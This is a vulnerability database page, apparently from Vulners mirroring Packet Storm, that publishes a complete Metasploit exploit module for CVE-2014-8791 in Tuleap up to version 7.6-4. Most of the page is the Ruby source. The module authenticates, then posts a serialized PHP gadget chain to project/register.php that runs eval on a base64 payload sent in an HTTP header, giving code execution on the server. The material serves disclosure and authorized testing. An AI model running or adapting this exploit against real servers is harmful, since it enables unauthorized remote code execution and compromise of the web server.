Lucene search
K

Tuleap PHP Unserialize Code Execution

🗓️ 12 Dec 2014 00:00:00Reported by EgiXType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 36 Views

Tuleap PHP Unserialize Code Execution in Tuelap <= 7.6-

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Tuleap 7.6-4 PHP Object Injection Vulnerability
30 Nov 201400:00
zdt
0day.today
Tuleap PHP Unserialize Code Execution Exploit
13 Dec 201400:00
zdt
Circl
CVE-2014-8791
15 Dec 201400:00
circl
Check Point Advisories
Tuleap PHP Unserialize Code Execution (CVE-2014-8791)
5 Oct 201600:00
checkpoint_advisories
CVE
CVE-2014-8791
2 Dec 201401:00
cve
Cvelist
CVE-2014-8791
2 Dec 201401:00
cvelist
Exploit DB
Tuleap - PHP Unserialize Code Execution (Metasploit)
15 Dec 201400:00
exploitdb
Metasploit
Tuleap PHP Unserialize Code Execution
9 Dec 201409:15
metasploit
NVD
CVE-2014-8791
2 Dec 201401:59
nvd
Packet Storm
Tuleap 7.6-4 PHP Object Injection
28 Nov 201400:00
packetstorm
Rows per page
`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Tuleap PHP Unserialize Code Execution',  
'Description' => %q{  
This module exploits a PHP object injection vulnerability in Tuelap <= 7.6-4 which could be  
abused to allow authenticated users to execute arbitrary code with the permissions of the  
web server. The dangerous unserialize() call exists in the 'src/www/project/register.php'  
file. The exploit abuses the destructor method from the Jabbex class in order to reach a  
call_user_func_array() call in the Jabbex class and call the fetchPostActions() method from  
the Transition_PostAction_FieldFactory class to execute PHP code through an eval() call. In  
order to work, the target must have the 'sys_create_project_in_one_step' option disabled.  
},  
'License' => MSF_LICENSE,  
'Author' => 'EgiX',  
'References' =>  
[  
['CVE', '2014-8791'],  
['OSVDB', '115128'],  
['URL', 'http://karmainsecurity.com/KIS-2014-13'],  
['URL', 'https://tuleap.net/plugins/tracker/?aid=7601']  
],  
'Platform' => 'php',  
'Arch' => ARCH_PHP,  
'Targets' => [['Generic (PHP Payload)', {}]],  
'DisclosureDate' => 'Nov 27 2014',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('TARGETURI', [true, "The base path to the web application", "/"]),  
OptString.new('USERNAME', [true, "The username to authenticate with" ]),  
OptString.new('PASSWORD', [true, "The password to authenticate with" ]),  
OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", true]),  
Opt::RPORT(443)  
], self.class)  
end  
  
def check  
flag = rand_text_alpha(rand(10)+20)  
res = exec_php("print #{flag};")  
  
if res and res.body and res.body.to_s =~ /#{flag}/  
return Exploit::CheckCode::Vulnerable  
end  
  
Exploit::CheckCode::Safe  
end  
  
def do_login()  
print_status("#{peer} - Logging in...")  
  
username = datastore['USERNAME']  
password = datastore['PASSWORD']  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'account/login.php'),  
'vars_post' => {'form_loginname' => username, 'form_pw' => password}  
})  
  
unless res && res.code == 302  
fail_with(Failure::NoAccess, "#{peer} - Login failed with #{username}:#{password}")  
end  
  
print_status("#{peer} - Login successful with #{username}:#{password}")  
res.get_cookies  
end  
  
def exec_php(php_code)  
session_cookies = do_login()  
  
chain = 'O:6:"Jabbex":2:{S:15:"\00Jabbex\00handler";O:12:"EventHandler":1:{S:27:"\00EventHandler\00authenticated";b:1;}'  
chain << 'S:11:"\00Jabbex\00jab";O:6:"Jabber":3:{S:8:"_use_log";i:1;S:11:"_connection";O:5:"Chart":0:{}S:15:"_event_handlers";'  
chain << 'a:1:{S:9:"debug_log";a:2:{i:0;O:34:"Transition_PostAction_FieldFactory":1:{S:23:"\00*\00post_actions_classes";'  
chain << 'a:1:{i:0;S:52:"1;eval(base64_decode($_SERVER[HTTP_PAYLOAD]));die;//";}}i:1;S:16:"fetchPostActions";}}}}'  
  
send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'project/register.php'),  
'cookie' => session_cookies,  
'vars_post' => {'data' => chain},  
'headers' => {'payload' => Rex::Text.encode_base64(php_code)}  
}, 3)  
end  
  
def exploit  
print_status("#{peer} - Exploiting the PHP object injection...")  
exec_php(payload.encoded)  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation